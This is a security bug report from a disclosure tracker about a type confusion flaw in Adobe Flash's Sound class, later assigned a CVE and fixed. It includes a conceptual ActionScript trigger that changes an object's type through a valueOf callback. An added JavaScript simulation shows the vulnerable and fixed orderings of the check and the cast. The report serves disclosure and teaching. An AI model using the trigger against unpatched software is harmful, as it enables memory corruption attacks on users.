Status: Fixed
Closed: Apr 2015
Adobe Flash: Type Confusion in Sound class
Reported by natashenka@google.com, Feb 13 2015
There is a type confusion issue in the Sound class (in all of its methods). The `this` object's type is checked, but then valueOf on another parameter to the method is called, which can change the type of the object before the pointer is actually cast to a native Sound object.

The code for this issue does not compile, so the PoC was created by compiling similar code and altering the SWF. But conceptually, the code for the issue is as follows:

	function mysubclass(a) {
		super();
		var s = super;

		// valueOf callback: runs while loadSound is coercing its argument,
		// i.e. after the this-type check but before the cast to a native Sound.
		function func() {
			trace(s);
			super(0);	// constructor call on this via __constructor__ (now Date), changing its native type
			return 10;
		}

		var n = {test: "hello"};
		n.valueOf = func;
		var f = this.loadSound;
		this.__proto__ = {};
		this.__proto__.__constructor__ = Date;	// make the super(0) above build a Date rather than a Sound
		f.call(this, n, n);	// Sound.loadSound checks this, then coerces n, which invokes func
	}

A PoC swf is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

 
super.swf
1.2 KB Download
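The pattern in the report is a check-then-use race inside a single native call: the method verifies the type of `this`, then converts an argument (which runs script-controlled valueOf), then casts `this` without re-checking. The following is an added example, not part of the bug report or of Flash's own code; it models that ordering in JavaScript with made-up "native" backing objects (`makeNativeSound`, `makeNativeDate`, the `NATIVE` slot, and all constants are constructed for illustration). The vulnerable variant interprets a Date's fields with the Sound layout after valueOf swaps the backing object; the fixed variant coerces all arguments before the type check so no script runs between the check and the cast.

```javascript
"use strict";

// Constructed "native" objects with different field layouts, modelled as slot arrays.
// Sound: slot 0 = sample buffer pointer, slot 1 = sample rate. Date: slot 0 = epoch millis.
function makeNativeSound(samplePtr) { return { tag: "Sound", slots: [samplePtr, 44100] }; }
function makeNativeDate(millis)     { return { tag: "Date",  slots: [millis] }; }

// Script-visible objects keep their native pointer in a hidden slot; the "cast" is
// reading that slot and trusting that it has the Sound layout.
const NATIVE = Symbol("nativePtr");
const SAMPLE_PTR = 0x7f001000;          // constructed pointer value
const DATE_MILLIS = 1423785600000;      // constructed epoch millis (Feb 13 2015)

function newSound() { const s = {}; s[NATIVE] = makeNativeSound(SAMPLE_PTR); return s; }

function isSound(self) {
  return self[NATIVE] !== undefined && self[NATIVE].tag === "Sound";
}

// Vulnerable ordering: check this, then coerce the argument (runs valueOf), then cast this.
function loadSoundVulnerable(self, offsetArg) {
  if (!isSound(self)) throw new TypeError("this is not a Sound");
  const offset = Number(offsetArg) | 0;   // ToPrimitive calls offsetArg.valueOf(): attacker code runs here
  const native = self[NATIVE];            // cast without re-checking the type
  // Reads whatever is in the slots using the Sound layout: with a Date here, the
  // millis value is treated as a sample pointer and the rate slot is missing.
  return { samplePtr: native.slots[0] + offset, rate: native.slots[1] };
}

// Fixed ordering: coerce every argument first, then check and cast with no script in between.
function loadSoundFixed(self, offsetArg) {
  const offset = Number(offsetArg) | 0;
  if (!isSound(self)) throw new TypeError("this is not a Sound");
  const native = self[NATIVE];
  return { samplePtr: native.slots[0] + offset, rate: native.slots[1] };
}

// Attacker-controlled argument: its valueOf retargets `self` to a Date, mirroring the
// report's this.__proto__.__constructor__ = Date; super(0) trick.
function buildAttack(self) {
  return {
    valueOf() {
      self[NATIVE] = makeNativeDate(DATE_MILLIS);
      return 0;
    },
  };
}

function runBenign() {
  return loadSoundVulnerable(newSound(), 4);          // no valueOf hook, normal result
}

function runVulnerable() {
  const s = newSound();
  return loadSoundVulnerable(s, buildAttack(s));      // Date millis come back as a "pointer"
}

function runFixed() {
  const s = newSound();
  try {
    loadSoundFixed(s, buildAttack(s));
    return "no error";
  } catch (e) {
    return e.constructor.name;                        // "TypeError": confusion caught before the cast
  }
}

console.log(runBenign(), runVulnerable(), runFixed());
```

The fix shape matters more than the language: any argument conversion that can call back into script (valueOf, toString, getters, coercion of a Proxy) must happen before the receiver is validated and cast, or the receiver must be re-validated afterwards. Reading the Date's slot as a pointer stands in for what the real bug does in native code, where the mis-cast object's fields are dereferenced directly.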
Comment 1 by natashenka@google.com, Feb 13 2015
Summary: Adobe Flash: Type Confusion in Sound class (was: Type Confusion in Sound class)
Comment 2 by cevans@google.com, Feb 13 2015
Labels: Id-3311
Comment 3 by cevans@google.com, Mar 26 2015
Possibly fixed by https://helpx.adobe.com/security/products/flash-player/apsb15-05.html ? Mailing Adobe to check.
Comment 4 by cevans@google.com, Apr 10 2015
Labels: CVE-2015-0356
Comment 6 by natashenka@google.com, Apr 24 2015
Labels: -Restrict-View-Commit